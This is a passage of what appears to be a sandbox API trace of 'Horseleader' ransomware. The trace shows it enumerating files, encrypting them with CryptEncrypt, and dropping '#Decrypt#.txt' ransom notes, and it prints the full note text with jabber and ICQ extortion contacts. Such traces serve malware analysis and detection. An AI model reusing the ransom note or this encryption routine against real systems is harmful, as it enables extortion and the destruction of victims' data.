(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.766] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.766] CloseHandle (hObject=0x1a4) returned 1 [0233.766] GetProcessHeap () returned 0x780000 [0233.766] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.766] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe7269b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe7269b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe7269b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0233.766] lstrcmpiW (lpString1="symbols.xml", lpString2="Windows") returned -1 [0233.766] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 80 [0233.766] StrStrIW (lpFirst="symbols.xml", lpSrch=".horseleader") returned 0x0 [0233.766] lstrcmpW (lpString1="symbols.xml", lpString2="#Decrypt#.txt") returned 1 [0233.766] lstrcmpW (lpString1="symbols.xml", lpString2="_uninstalling_.png") returned 1 [0233.766] lstrlenW (lpString=".testttjffg") returned 11 [0233.766] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpSrch=".testttjffg") returned 0x0 [0233.767] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.767] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.767] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.802] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="web", cAlternateFileName="")) returned 1 [0233.802] lstrcmpiW (lpString1="web", lpString2="Windows") returned -1 [0233.802] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web") returned 72 [0233.802] lstrcmpW (lpString1="web", lpString2=".") returned 1 [0233.802] lstrcmpW (lpString1="web", lpString2="..") returned 1 [0233.802] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.802] GetProcessHeap () returned 0x780000 [0233.802] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.802] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*") returned 74 [0233.802] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.851] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.851] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\.") returned 74 [0233.851] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.851] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.851] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.851] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\..") returned 75 [0233.851] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.852] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.852] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="webbase.xml", cAlternateFileName="")) returned 1 [0233.852] lstrcmpiW (lpString1="webbase.xml", lpString2="Windows") returned -1 [0233.852] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml") returned 84 [0233.852] StrStrIW (lpFirst="webbase.xml", lpSrch=".horseleader") returned 0x0 [0233.852] lstrcmpW (lpString1="webbase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.852] lstrcmpW (lpString1="webbase.xml", lpString2="_uninstalling_.png") returned 1 [0233.852] lstrlenW (lpString=".testttjffg") returned 11 [0233.852] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml", lpSrch=".testttjffg") returned 0x0 [0233.852] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.852] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.864] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900d3c7b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x900d3c7b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x900f9dd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x48e, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="webbase.xml", cAlternateFileName="")) returned 0 [0233.864] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.868] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\#Decrypt#.txt") returned 86 [0233.868] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.869] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.869] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.871] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.871] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.871] CloseHandle (hObject=0x1a4) returned 1 [0233.871] GetProcessHeap () returned 0x780000 [0233.871] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.871] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="web.xml", cAlternateFileName="")) returned 1 [0233.871] lstrcmpiW (lpString1="web.xml", lpString2="Windows") returned -1 [0233.871] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 76 [0233.871] StrStrIW (lpFirst="web.xml", lpSrch=".horseleader") returned 0x0 [0233.871] lstrcmpW (lpString1="web.xml", lpString2="#Decrypt#.txt") returned 1 [0233.872] lstrcmpW (lpString1="web.xml", lpString2="_uninstalling_.png") returned 1 [0233.872] lstrlenW (lpString=".testttjffg") returned 11 [0233.872] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpSrch=".testttjffg") returned 0x0 [0233.872] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.872] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.872] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="web.xml", cAlternateFileName="")) returned 0 [0233.872] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0233.872] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\#Decrypt#.txt") returned 82 [0233.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0233.886] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.886] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0233.888] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.888] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0233.888] CloseHandle (hObject=0x158) returned 1 [0233.888] GetProcessHeap () returned 0x780000 [0233.888] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0233.888] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="he-IL", cAlternateFileName="")) returned 1 [0233.888] lstrcmpiW (lpString1="he-IL", lpString2="Windows") returned -1 [0233.888] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned 60 [0233.889] lstrcmpW (lpString1="he-IL", lpString2=".") returned 1 [0233.889] lstrcmpW (lpString1="he-IL", lpString2="..") returned 1 [0233.889] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.889] GetProcessHeap () returned 0x780000 [0233.889] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0233.889] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*") returned 62 [0233.889] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0233.890] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.890] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\.") returned 62 [0233.890] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.890] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0233.890] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.890] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 